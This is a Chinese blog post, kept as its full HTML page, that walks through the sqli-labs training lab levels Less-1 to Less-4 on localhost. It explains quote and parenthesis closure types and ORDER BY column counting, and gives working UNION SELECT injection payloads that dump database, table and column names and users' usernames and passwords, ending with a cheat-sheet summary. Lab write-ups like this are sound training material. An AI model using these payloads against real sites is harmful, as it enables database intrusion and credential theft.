<!DOCTYPE html>


<html lang="en">
  

    <head>
      <meta charset="utf-8" />
        
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>Less-1~Less-4 |  云芽的博客</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css"
      />
      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    <link rel="alternate" href="/atom.xml" title="云芽的博客" type="application/atom+xml">
</head>
  </html>
</html>


<body>
  <div id="app">
    
      <canvas class="fireworks"></canvas>
      <style>
        .fireworks {
          position: fixed;
          left: 0;
          top: 0;
          z-index: 99999;
          pointer-events: none;
        }
      </style>
      
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-sqli-labs通关指南/Less-1~Less-4"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  Less-1~Less-4
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2021/10/06/sqli-labs%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/Less-1~Less-4/" class="article-date">
  <time datetime="2021-10-06T06:02:39.000Z" itemprop="datePublished">2021-10-06</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/sqli-labs%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/">sqli-labs通关指南</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">1.3k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">5 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h3 id="Less-1"><a href="#Less-1" class="headerlink" title="Less-1"></a>Less-1</h3><p>题目：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211006194458485.png" alt="image-20211006194458485" style="zoom:33%;" />

<p>解题：</p>
<p><strong>单引号闭合</strong></p>
<p>Sql 语句为SELECT * FROM users WHERE id=’$id’ LIMIT 0,1;</p>
<p><strong>找到注入点，发现报错回显</strong></p>
<p>提示传入id的参数，后面跟个单引号<a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=1%E2%80%99%EF%BC%8C%E5%8F%91%E7%8E%B0%E6%8A%A5%E9%94%99%EF%BC%8C%E8%BF%99%E9%87%8C%E7%9C%8B%E5%88%B0%E6%98%AF%E5%B7%B2%E7%BB%8F%E9%97%AD%E5%90%88%E4%BA%86%E3%80%82%E4%BB%8E%E6%8A%A5%E9%94%99%E5%86%85%E5%AE%B9%E4%B8%AD%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%87%BAid%E4%BC%A0%E5%85%A5%E7%9A%84%E6%98%AFstr%E7%B1%BB%E5%9E%8B%EF%BC%8C%E5%8F%AF%E4%BB%A5%E5%88%86%E8%A7%A3%E6%88%90%E8%BF%99%E6%A0%B7%E6%9D%A5%E7%9C%8B%E4%BC%A0%E9%80%92%E4%BA%86%E4%B8%80%E4%B8%AA1%E2%80%99%E7%9A%84%E5%8F%82%E6%95%B0%EF%BC%8C%E5%B9%B6%E4%B8%941%E2%80%99%E7%9A%84%E5%8F%82%E6%95%B0%E7%94%A8%E5%8D%95%E5%BC%95%E5%8F%B7%E5%8C%85%E8%A3%B9%EF%BC%8C%E6%9C%80%E5%90%8E%E5%86%8D%E6%9C%80%E5%A4%96%E5%B1%82%E4%B8%80%E5%B1%82%E5%8D%95%E5%BC%95%E5%8F%B7&#39;">http://localhost/sqli-labs-master/Less-1/?id=1’，发现报错，这里看到是已经闭合了。从报错内容中可以看出id传入的是str类型，可以分解成这样来看传递了一个1’的参数，并且1’的参数用单引号包裹，最后再最外层一层单引号&#39;</a> ‘ 1’  ‘ LIMIT 0,1 ‘。然后再进行order by 来排序确定字段数。</p>
<p>此时sql语句为SELECT * FROM users WHERE id=’1’–+’ LIMIT 0,1（简记–+注释掉了多余的‘）</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211006194723632.png" alt="image-20211006194723632" style="zoom:33%;" />

<p><strong>判断字段数</strong></p>
<p>在后面加–+注释掉后面的部分。（简记：输入的id=1’…–+，注释符–+将多余的单引号注释掉。）</p>
<p>利用order by判断字段数，发现字段数为3。（3正常返回，4显示错误）</p>
<p>注：常见的注释符：%23（#）、-–+、；%00、`、……</p>
<p>有时候#或–+或%00不一定可以使用，因为它本身可能有过滤，但过滤看不到，所以需要尝试哪个可以用</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211006200958933.png" alt="image-20211006200958933" style="zoom:33%;" />

<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211006200910334.png" alt="image-20211006200910334" style="zoom:33%;" />

<p><strong>判断结果输出位置</strong></p>
<p>采用联合注入测试输入的值分别对应哪个字段：</p>
<p>（简记：序号字段放1（不代表真的第一行），登录名字段放2，密码字段放3）</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211007004002099.png" alt="image-20211007004002099" style="zoom:33%;" />

<p>然后查看当前数据库名和数据库版本号。得到表名为security。</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211007002844876.png" alt="image-20211007002844876" style="zoom:33%;" />

<p>补充知识：</p>
<p>注：UNION操作符用于合并两个或多个SELECT语句的结果集。</p>
<p>union会执行两句话，而需要前面那句话为空，后面的信息才可以显示出来。</p>
<p><strong>爆库、爆表、爆列</strong></p>
<p>爆当前数据库的集合shema：</p>
<p><a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=-1&#39;">Http://localhost/sqli-labs-master/Less-1/?id=-1&#39;</a> union select 1,group_concat(schema_name),3 from information_schema.schemata –+</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211007005148150.png" alt="image-20211007005148150" style="zoom:33%;" />

<p>爆security库的表名：<br><a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=-1&#39;">http://localhost/sqli-labs-master/Less-1/?id=-1&#39;</a> union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘security’ –+</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211007005525304.png" alt="image-20211007005525304" style="zoom:33%;" />

<p>爆users表的列字段：</p>
<p><a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=-1&#39;">http://localhost/sqli-labs-master/Less-1/?id=-1&#39;</a> union select 1,group_concat(column_name),3 from information_schema.columns where table_name = ‘users’  –+</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211007010115724.png" alt="image-20211007010115724" style="zoom:33%;" />

<p>爆数据（查询username 和password的值）：</p>
<p><a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=-1&#39;">http://localhost/sqli-labs-master/Less-1/?id=-1&#39;</a> union select 1,group_concat(username),group_concat(password) from users –+</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211010212315766.png" alt="image-20211010212315766" style="zoom:33%;" />

<p>注：group_concat这个函数可以将多个字符串连接成一个字符串即将结果一行输出</p>
<p>TABLE表：提供了关于数据库中的表的信息（包括视图）</p>
<p>COLUMNS表：提供了表中的列信息即字段数</p>
<p>SCHEMATA表:储存mysql所有数据库的基本信息，包括数据库名，编码类型路径等，show databases的结果取之此表。</p>
<p>table_schema=database()只会搜索当前数据库</p>
<p>group_concat()函数将结果集整合成一句话输出，其间用逗号隔开</p>
<p>爆破库名：</p>
<ul>
<li>union select 1,2,database()</li>
</ul>
<p>爆表名：</p>
<ul>
<li>union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()</li>
<li>union select 1,2, group_concat(table_name) from information_schema.columns where table_schema=database()</li>
</ul>
<p>爆Column名：</p>
<ul>
<li>union select 1,2, group_concat(column_name) from information_schema.columns where table_schema=database()</li>
</ul>
<h3 id="Less-2"><a href="#Less-2" class="headerlink" title="Less-2"></a>Less-2</h3><p>注：2-4关判断完闭合类型后参照less-1的做法即可拿到数据。</p>
<p>题目：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211008113512372.png" alt="image-20211008113512372" style="zoom:33%;" />

<p>解题：</p>
<p><strong>无符号闭合</strong></p>
<p>Sql 语句为SELECT * FROM users WHERE id=$id LIMIT 0,1;</p>
<p>输入?id=1’测试注入点，发现原来已经闭合去掉多余的单引号即可拿到数据，然后根据less-1解题即可。</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211008113338523.png" alt="image-20211008113338523" style="zoom:33%;" />

<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211010010153562.png" alt="image-20211010010153562" style="zoom:33%;" />

<h3 id="Less-3"><a href="#Less-3" class="headerlink" title="Less-3"></a>Less-3</h3><p>题目：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211009141550137.png" alt="image-20211009141550137" style="zoom:33%;" />

<p>解题：</p>
<p>Sql 语句为SELECT * FROM users WHERE id=(‘$id’) LIMIT 0,1;</p>
<p>测试注入点，发现回显后面多一个）导致无法闭合：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211009142325543.png" alt="image-20211009142325543" style="zoom:33%;" />

<p>重构payload，发现可以闭合：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211009142556677.png" alt="image-20211009142556677" style="zoom:33%;" />

<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211010011050623.png" alt="image-20211010011050623" style="zoom:33%;" />

<h3 id="Less-4"><a href="#Less-4" class="headerlink" title="Less-4"></a>Less-4</h3><p>题目：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211009143136083.png" alt="image-20211009143136083" style="zoom:33%;" />

<p>解题：</p>
<p>Sql 语句为SELECT * FROM users WHERE id=(“$id”) LIMIT 0,1;</p>
<p>测试id=1‘发现没有报错：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211009143259703.png" alt="image-20211009143259703" style="zoom:33%;" />

<p>测试双引号（不是两个单引号）：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211009143359479.png" alt="image-20211009143359479" style="zoom:33%;" />

<p>重构payload闭合：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211009143920776.png" alt="image-20211009143920776" style="zoom:33%;" />

<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><h4 id="判断出闭合形式及字段数"><a href="#判断出闭合形式及字段数" class="headerlink" title="判断出闭合形式及字段数"></a>判断出闭合形式及字段数</h4><p>SQL语句的闭合形式大概有以下几种：</p>
<pre><code>SELECT * FROM `users` WHERE id= 1;#整形闭合
SELECT * FROM `users` WHERE id=&#39;1&#39;;#单引号闭合
SELECT * FROM `users` WHERE id=&quot;1&quot;;#双引号闭合
SELECT * FROM `users` WHERE id=(&#39;1&#39;);#单引号加括号
SELECT * FROM `users` WHERE id=(&quot;1&quot;);#双引号加括号
&#39;))
&quot;))
</code></pre>
<p>注：在没有遇到正确的闭合形式前的注入都会把符号（包括注释符）当做一个整体！</p>
<p>整形闭合报错：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211010023230133.png" alt="image-20211010023230133" style="zoom:33%;" />

<p>单引号闭合报错：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211010023326148.png" alt="image-20211010023326148" style="zoom:33%;" />

<p>双引号闭合报错：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211010023446397.png" alt="image-20211010023446397" style="zoom:33%;" />

<p>单引号加括号报错：</p>
<img src="/source/images/%E8%A7%A3%E9%A2%98-sqli-labs/image-20211010023400868.png" alt="image-20211010023400868" style="zoom:33%;" />

<p>双引号加括号报错：</p>
<p>（暂时还没遇到）</p>
<p>利用order by +整型数字来判断字段数，当超出范围后将报错。</p>
<h4 id="根据闭合类型进行联合查询"><a href="#根据闭合类型进行联合查询" class="headerlink" title="根据闭合类型进行联合查询"></a>根据闭合类型进行联合查询</h4><p>根据闭合类型再将1变为-1，再结合字段数利用union联合查询。</p>
<p>union会执行两句话，而需要前面那句话为空（可将数字设为-1），后面的信息才可以显示出来。</p>
<h4 id="爆库、爆表、爆列、爆数据"><a href="#爆库、爆表、爆列、爆数据" class="headerlink" title="爆库、爆表、爆列、爆数据"></a>爆库、爆表、爆列、爆数据</h4><p>利用sql注入层层爆破获取数据。命令参考第一关。</p>
<p>爆库：union select 1,2,database()</p>
<p>爆集合：union select 1,group_concat(schema_name),3 from information_schema.schemata </p>
<p>爆表：</p>
<ul>
<li>union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()</li>
<li>union select 1,2, group_concat(table_name) from information_schema.columns where table_schema=database()</li>
</ul>
<p>爆列：union select 1,2, group_concat(column_name) from information_schema.columns where table_schema=database()</p>
<p>爆数据：union select 1,group_concat(username),group_concat(password) from users –+</p>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          Donate
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2021/10/06/sqli-labs%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/Less-1~Less-4/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2021/10/19/sqli-labs%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/Less-5~Less-6/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            Less-5~Less-6
          
        </div>
      </a>
    
    
      <a href="/2021/10/04/ctf%E8%A7%A3%E9%A2%98/CTFHUB-WEB-XSS/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">CTFHUB(WEB)-XSS</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "",
    app_key: "",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2021
        <i class="ri-heart-fill heart_icon"></i> yunya
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="云芽的博客"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script>

<script src="/js/clickBoom1.js"></script>
 
<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
</body>

</html>